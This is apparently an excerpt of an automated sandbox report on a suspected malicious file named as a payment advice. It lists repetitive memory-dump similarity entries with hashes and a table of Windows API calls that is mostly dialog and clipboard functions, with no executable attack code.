                                                                                                                                    • Opcode ID: 3327f00dd193bae948b8b74339ebd4673393a6af1c09472d1ee4ca17a3b08f4d
                                                                                                                                    • Instruction ID: 7c62552e42547f244202426a6dda9e779b86fb055c85e6a9ffc2c561f2c802a2
                                                                                                                                    • Opcode Fuzzy Hash: 3327f00dd193bae948b8b74339ebd4673393a6af1c09472d1ee4ca17a3b08f4d
                                                                                                                                    • Instruction Fuzzy Hash: 54C1A174E01218CFDB54DFA5C994B9DBBB2AF89300F1080A9D409BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 55846448daccbf0db03dcb57c48f12b6c01fde4d8545104657d27dbbbad226a9
                                                                                                                                    • Instruction ID: c87cd8985ffb6de237ea3c2914a8d1f3883eab8ebc4d88dfcbf98aa7920785ad
                                                                                                                                    • Opcode Fuzzy Hash: 55846448daccbf0db03dcb57c48f12b6c01fde4d8545104657d27dbbbad226a9
                                                                                                                                    • Instruction Fuzzy Hash: A5C1A074E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D409BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d3337671bf1154bbd526b8f39164f88a7e70f15ffa2e4f4f3ebe121d27dfc66e
                                                                                                                                    • Instruction ID: f289187b32cff0fb9afb804aa0d538fee905440353ff99df5bcc98a24ef514a5
                                                                                                                                    • Opcode Fuzzy Hash: d3337671bf1154bbd526b8f39164f88a7e70f15ffa2e4f4f3ebe121d27dfc66e
                                                                                                                                    • Instruction Fuzzy Hash: 28C1BF74E00218CFDB54DFA5C994B9DBBB2AF89300F2080A9D419BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 8a2c57e240fc32d65e28469bd106e790dd7e5236dd17814bd82d695eacbf0605
                                                                                                                                    • Instruction ID: be395d0d0801c4eb7db977447e988a36bf9ec4ed6528477a3acb81a23ae11361
                                                                                                                                    • Opcode Fuzzy Hash: 8a2c57e240fc32d65e28469bd106e790dd7e5236dd17814bd82d695eacbf0605
                                                                                                                                    • Instruction Fuzzy Hash: E3C1A074E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D408BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4ad4e70510912e8df1d487895f6486a158c93ec80d8632f5974c6ad3b4eb1d73
                                                                                                                                    • Instruction ID: a77b60166cb8ff116b5b921fd5251a156d28b2dd58b07d14b452ff3367954549
                                                                                                                                    • Opcode Fuzzy Hash: 4ad4e70510912e8df1d487895f6486a158c93ec80d8632f5974c6ad3b4eb1d73
                                                                                                                                    • Instruction Fuzzy Hash: F9C1A074E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D408BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 5ddea710d3628da77322dab3455abeebe1742027d7422c3c2c8802985a2a46bb
                                                                                                                                    • Instruction ID: c7cd013f2053f80e7c0083b18bf69529cedbd2ad1c565fd20272f7da8c90755f
                                                                                                                                    • Opcode Fuzzy Hash: 5ddea710d3628da77322dab3455abeebe1742027d7422c3c2c8802985a2a46bb
                                                                                                                                    • Instruction Fuzzy Hash: F8C1A174E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D409BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 495c05eb2230fbce4337ebbfeef4aa21af4511b7f585f8c39eb9db8f62a0bffe
                                                                                                                                    • Instruction ID: 4abd3cfad3687201a430b04322635cb239a95eb99f1aecb7f635b1c567cd320f
                                                                                                                                    • Opcode Fuzzy Hash: 495c05eb2230fbce4337ebbfeef4aa21af4511b7f585f8c39eb9db8f62a0bffe
                                                                                                                                    • Instruction Fuzzy Hash: AEC1B074E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D418BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 1b8e182f29194a109e4bf7274db51f807f84f0aadeab04178645b65ce61138b5
                                                                                                                                    • Instruction ID: bdab3cdbf3806ba9e558c95e79862f47335834250a75438536414ee2d9080703
                                                                                                                                    • Opcode Fuzzy Hash: 1b8e182f29194a109e4bf7274db51f807f84f0aadeab04178645b65ce61138b5
                                                                                                                                    • Instruction Fuzzy Hash: 05C1B074E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D409BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c9fdd878e55237e2fa846b84d5e8dcf1103846f8c72641dd430e8fdc2dbd5a5a
                                                                                                                                    • Instruction ID: 4a2bc6994a33f415a08dec6bd7ffa780d98209929c2a6770693f1eb5c1330261
                                                                                                                                    • Opcode Fuzzy Hash: c9fdd878e55237e2fa846b84d5e8dcf1103846f8c72641dd430e8fdc2dbd5a5a
                                                                                                                                    • Instruction Fuzzy Hash: C4C1BF74E01218CFDB54DFA5C994B9DBBB2AF89300F1084A9D408BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 70dac8445cb42de8a6aea79175837e98403c4aa38500dfdd62acc7a68214a56b
                                                                                                                                    • Instruction ID: 8a0652a990388936f21a17a91637ab615bdb94114359d7af8fc26272f8af983f
                                                                                                                                    • Opcode Fuzzy Hash: 70dac8445cb42de8a6aea79175837e98403c4aa38500dfdd62acc7a68214a56b
                                                                                                                                    • Instruction Fuzzy Hash: 6CC1B174E01218CFDB54DFA5C994B9DBBB2AF89300F1080A9D418BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a8b912fd3c67cc90ed66334f5910c866ecc8856d5cad83469ddc972128a342a6
                                                                                                                                    • Instruction ID: 9a5b30b49d55f9f324c99037981de13cc3e804e65adf7ec9a6d36c6b5fb226f9
                                                                                                                                    • Opcode Fuzzy Hash: a8b912fd3c67cc90ed66334f5910c866ecc8856d5cad83469ddc972128a342a6
                                                                                                                                    • Instruction Fuzzy Hash: 28C1B074E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D408BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 572cdd853ac05062f1e5d5bb73583ead8fde0b2b1c1230af5b84d71f743ae361
                                                                                                                                    • Instruction ID: a976b064d4ed506e1504e4496fe483669a5f9b6783deeb7c3e5476e69bf35971
                                                                                                                                    • Opcode Fuzzy Hash: 572cdd853ac05062f1e5d5bb73583ead8fde0b2b1c1230af5b84d71f743ae361
                                                                                                                                    • Instruction Fuzzy Hash: FEC1B074E01218CFDB54DFA9D994B9DBBB2AF89300F1080A9D408BB364DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 07816ebca10459087ca0acad21468d944963af1649102483ff910b1fbf6317a8
                                                                                                                                    • Instruction ID: c67894bb5c62c9fcc15438903097bf54d9c22ae55a1e172fbb140e05aba71f27
                                                                                                                                    • Opcode Fuzzy Hash: 07816ebca10459087ca0acad21468d944963af1649102483ff910b1fbf6317a8
                                                                                                                                    • Instruction Fuzzy Hash: 7AC1BF74E01218CFDB54DFA5C994B9DBBB2AF89301F1080A9D418BB365DB35AE86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b477708739dd295264310675abd78efa13acc26aea5608b23fc9665c6da88b85
                                                                                                                                    • Instruction ID: 1ce5fb92c6b2d91d62ee23da4fb85c74b307d452cc295f6d60a42ea206adca99
                                                                                                                                    • Opcode Fuzzy Hash: b477708739dd295264310675abd78efa13acc26aea5608b23fc9665c6da88b85
                                                                                                                                    • Instruction Fuzzy Hash: 64C1B074E00258CFDB54DFA5C994B9DBBB2AF89300F1080A9D408BB365DB35AE86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2fa0a850b3643fa5e26a678939a0307ffa73620ee921de5d067b8fa4539e4798
                                                                                                                                    • Instruction ID: d1421abe3d2685aec6cb1add328c20f7eb1660cf223962552a9523ece2c397bc
                                                                                                                                    • Opcode Fuzzy Hash: 2fa0a850b3643fa5e26a678939a0307ffa73620ee921de5d067b8fa4539e4798
                                                                                                                                    • Instruction Fuzzy Hash: D4C1B074E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D409BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: debd0fd3215e31c82cf19a1f07f85a5a48781898b8547e78ec2dc8c924eeeb88
                                                                                                                                    • Instruction ID: a8aa63a81f4fd50e76ac01db2da2c9b8572f61d9977b416229c83f30f6281145
                                                                                                                                    • Opcode Fuzzy Hash: debd0fd3215e31c82cf19a1f07f85a5a48781898b8547e78ec2dc8c924eeeb88
                                                                                                                                    • Instruction Fuzzy Hash: 90C1BF74E01218CFDB54DFA5C994B9DBBB2AF89300F2080A9D418BB364DB359E86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7cbc671c0486f05a93748ddacc551e79a8d10638293124af73a1410bccaf6f3d
                                                                                                                                    • Instruction ID: dde38770a0790a16cf4aaf93a2ce847d1d67ac6df8ab02504c96c8c8efb1447c
                                                                                                                                    • Opcode Fuzzy Hash: 7cbc671c0486f05a93748ddacc551e79a8d10638293124af73a1410bccaf6f3d
                                                                                                                                    • Instruction Fuzzy Hash: 4CC1A074E00218CFDB54DFA5C994B9DBBB2AF89300F2080A9D409BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 11e802ab70b0c5b6d7013c308acb5aa9a53946e5a8f5ae6e544c787959cb19bf
                                                                                                                                    • Instruction ID: 0fd79231d8b6971d217e23493545644c859f1c1c97c15ea6385fb000e18b5291
                                                                                                                                    • Opcode Fuzzy Hash: 11e802ab70b0c5b6d7013c308acb5aa9a53946e5a8f5ae6e544c787959cb19bf
                                                                                                                                    • Instruction Fuzzy Hash: C9C1AF74E00218CFDB54DFA5C994B9DBBB2AF89300F2080A9D409BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 35fcb23c6c4f9023c72e601aa4b3e0d66e37b4ac87627294f8b96edafcfccf5f
                                                                                                                                    • Instruction ID: 1ac53b90eaf69620f23f3469521e04d7ff11b6da09481d72fe2989d06cbdb6d3
                                                                                                                                    • Opcode Fuzzy Hash: 35fcb23c6c4f9023c72e601aa4b3e0d66e37b4ac87627294f8b96edafcfccf5f
                                                                                                                                    • Instruction Fuzzy Hash: E4C1A174E00218CFDB54DFA5C994B9DBBB2AF89300F2080A9D419BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c9d478e1de38b40f24bf512dd4a3ccd896bf1615a8362e0dfde9b2e313c53cf3
                                                                                                                                    • Instruction ID: be050485b50685e662b4ab098ae166d95f01ef063496cb9fcbf60e7f9ed223ad
                                                                                                                                    • Opcode Fuzzy Hash: c9d478e1de38b40f24bf512dd4a3ccd896bf1615a8362e0dfde9b2e313c53cf3
                                                                                                                                    • Instruction Fuzzy Hash: 31C1A074E01218CFDB54DFA5C994B9DBBB2AF89300F2084A9D408BB365DB359E86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960970326.0000000037520000.00000040.00000800.00020000.00000000.sdmp, Offset: 37520000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37520000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d7c6714c3fcf1b218f5b6c43e3287c3588e7744e1e2d5b317ba93f43e3f085cf
                                                                                                                                    • Instruction ID: c3667ae468a182fdd7cb416f01b871f5ff6d76f43c8b3882ffdfd455a67ccc81
                                                                                                                                    • Opcode Fuzzy Hash: d7c6714c3fcf1b218f5b6c43e3287c3588e7744e1e2d5b317ba93f43e3f085cf
                                                                                                                                    • Instruction Fuzzy Hash: 64C1B174E00218CFDB54DFA9D994B9DBBB2AF89301F1080A9D409BB365DB359E86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e330457bfb065dc4fce195c27be131e4529543cba7307fb946fe1fd0b19441d9
                                                                                                                                    • Instruction ID: 97ab61b4a4bb2b95c293b93214b319eca8d66882953c9c77a0506665a4b927ed
                                                                                                                                    • Opcode Fuzzy Hash: e330457bfb065dc4fce195c27be131e4529543cba7307fb946fe1fd0b19441d9
                                                                                                                                    • Instruction Fuzzy Hash: 8DC1BF74E00258CFDB54DFA5C984BDDBBB2AF89300F1081A9D419AB365DB35AA86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: af8b4371de864817d9aad0faeec15d5e0e8fbfca6d47d7b5ab16f1e39c6fae7f
                                                                                                                                    • Instruction ID: 4cc64c4f2b6e5d4da4fea65f64650f3a3c90d4712db548c185ea3b7673e9a8b4
                                                                                                                                    • Opcode Fuzzy Hash: af8b4371de864817d9aad0faeec15d5e0e8fbfca6d47d7b5ab16f1e39c6fae7f
                                                                                                                                    • Instruction Fuzzy Hash: 5FC1CF74E00258CFDB54DFA5C984BDDBBB2AF89300F1081A9D418BB364DB35AA86CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 355b3273ac0c4954d2737b3d4ec05c7453d4808b4aae16830301d33224c9e173
                                                                                                                                    • Instruction ID: 30a5bf0cbcf950aeccca82fce764acf1322095f7d7e373e04b9a81e4b46c77cb
                                                                                                                                    • Opcode Fuzzy Hash: 355b3273ac0c4954d2737b3d4ec05c7453d4808b4aae16830301d33224c9e173
                                                                                                                                    • Instruction Fuzzy Hash: 63C1AF74E01218CFDB54DFA5C994BDDBBB2AF89300F1080A9D418BB364DB35AA86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b2af35ed0f346a4b6da95278793ffbffb73ae67da2c9ba5ba93e88d36ffdb899
                                                                                                                                    • Instruction ID: bf2ffade495eec676fbf346b7b155d9130d95bc48c9d76a4119d47c7529ade21
                                                                                                                                    • Opcode Fuzzy Hash: b2af35ed0f346a4b6da95278793ffbffb73ae67da2c9ba5ba93e88d36ffdb899
                                                                                                                                    • Instruction Fuzzy Hash: 59C1A074E01258CFDB54DFA5C994BDDBBB2AF89300F1080A9D418BB354DB35AA86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2960763460.0000000037470000.00000040.00000800.00020000.00000000.sdmp, Offset: 37470000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37470000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 059ca405a60ee2a755e2981e99bbeb24138174ae88c4ba36d2aa8bf9ba40ec56
                                                                                                                                    • Instruction ID: 5675fccd5884dd27db1253fe5def0c7e249d69b10d3f7afa726f552b4e272465
                                                                                                                                    • Opcode Fuzzy Hash: 059ca405a60ee2a755e2981e99bbeb24138174ae88c4ba36d2aa8bf9ba40ec56
                                                                                                                                    • Instruction Fuzzy Hash: 17C1AF74E01218CFDB54DFA5C994BDDBBB2AF89300F1080A9D418BB365DB35AA86CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2961153208.0000000037A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 37A50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_37a50000_PAYMENT ADVICE TT07180016-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b6aeb6c539e0603a41ca3da86250313bca1cb651814a3278dd8f3c91a6b5df01
                                                                                                                                    • Instruction ID: c583b353133dda6b84ade08daf85bf084ba3a55c8a79f9304cfe6b9338f35aea
                                                                                                                                    • Opcode Fuzzy Hash: b6aeb6c539e0603a41ca3da86250313bca1cb651814a3278dd8f3c91a6b5df01
                                                                                                                                    • Instruction Fuzzy Hash: 3BD06775E442588ACB11DF98D8402ECB770EFDA311F0124A6D558A7110D6719A908F56
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,00000403), ref: 00405351
                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00405360
                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040539D
                                                                                                                                    • GetSystemMetrics.USER32(00000002), ref: 004053A4
                                                                                                                                    • SendMessageW.USER32(?,00001061,00000000,?), ref: 004053C5
                                                                                                                                    • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004053D6
                                                                                                                                    • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004053E9
                                                                                                                                    • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004053F7
                                                                                                                                    • SendMessageW.USER32(?,00001024,00000000,?), ref: 0040540A
                                                                                                                                    • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040542C
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 00405440
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00405461
                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405471
                                                                                                                                    • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040548A
                                                                                                                                    • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405496
                                                                                                                                    • GetDlgItem.USER32(?,000003F8), ref: 0040536F
                                                                                                                                      • Part of subcall function 0040414E: SendMessageW.USER32(00000028,?,00000001,00403F7A), ref: 0040415C
                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004054B3
                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,Function_00005287,00000000), ref: 004054C1
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 004054C8
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004054EC
                                                                                                                                    • ShowWindow.USER32(?,00000008), ref: 004054F1
                                                                                                                                    • ShowWindow.USER32(00000008), ref: 0040553B
                                                                                                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040556F
                                                                                                                                    • CreatePopupMenu.USER32 ref: 00405580
                                                                                                                                    • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405594
                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004055B4
                                                                                                                                    • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004055CD
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405605
                                                                                                                                    • OpenClipboard.USER32(00000000), ref: 00405615
                                                                                                                                    • EmptyClipboard.USER32 ref: 0040561B
                                                                                                                                    • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405627
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00405631
                                                                                                                                    • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405645
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00405665
                                                                                                                                    • SetClipboardData.USER32(0000000D,00000000), ref: 00405670
                                                                                                                                    • CloseClipboard.USER32 ref: 00405676
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.2933392357.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000004.00000002.2933375930.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933408044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000004.00000002.2933424132.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
